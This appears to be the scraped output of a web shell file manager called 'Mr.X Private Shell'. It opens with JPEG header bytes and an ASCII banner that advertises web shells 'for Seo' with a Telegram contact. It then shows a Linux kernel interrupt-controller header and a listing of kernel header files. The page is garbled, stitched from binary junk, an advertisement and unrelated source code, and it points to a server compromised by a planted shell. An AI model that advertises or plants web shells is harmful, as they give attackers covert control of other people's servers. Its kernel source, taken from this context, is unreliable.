����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
* Copyright (C) 2019 Texas Instruments
*/
#ifndef _LINUX_IRQ_DAVINCI_CP_INTC_
#define _LINUX_IRQ_DAVINCI_CP_INTC_
#include <linux/ioport.h>
/**
* struct davinci_cp_intc_config - configuration data for davinci-cp-intc
* driver.
*
* @reg: register range to map
* @num_irqs: number of HW interrupts supported by the controller
*/
struct davinci_cp_intc_config {
struct resource reg;
unsigned int num_irqs;
};
int davinci_cp_intc_init(const struct davinci_cp_intc_config *config);
#endif /* _LINUX_IRQ_DAVINCI_CP_INTC_ */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| arm-gic-common.h | File | 480 B | 0644 |
|
| arm-gic-v3-prio.h | File | 1.76 KB | 0644 |
|
| arm-gic-v3.h | File | 23.93 KB | 0644 |
|
| arm-gic-v4.h | File | 3.8 KB | 0644 |
|
| arm-gic.h | File | 5.26 KB | 0644 |
|
| arm-vgic-info.h | File | 1001 B | 0644 |
|
| arm-vic.h | File | 353 B | 0644 |
|
| chained_irq.h | File | 931 B | 0644 |
|
| irq-bcm2836.h | File | 1.89 KB | 0644 |
|
| irq-davinci-aintc.h | File | 674 B | 0644 |
|
| irq-davinci-cp-intc.h | File | 616 B | 0644 |
|
| irq-ixp4xx.h | File | 276 B | 0644 |
|
| irq-madera.h | File | 3.66 KB | 0644 |
|
| irq-omap-intc.h | File | 567 B | 0644 |
|
| irq-partition-percpu.h | File | 1.32 KB | 0644 |
|
| irq-sa11x0.h | File | 356 B | 0644 |
|
| mmp.h | File | 155 B | 0644 |
|
| mxs.h | File | 221 B | 0644 |
|
| versatile-fpga.h | File | 353 B | 0644 |
|
| xtensa-mx.h | File | 467 B | 0644 |
|
| xtensa-pic.h | File | 532 B | 0644 |
|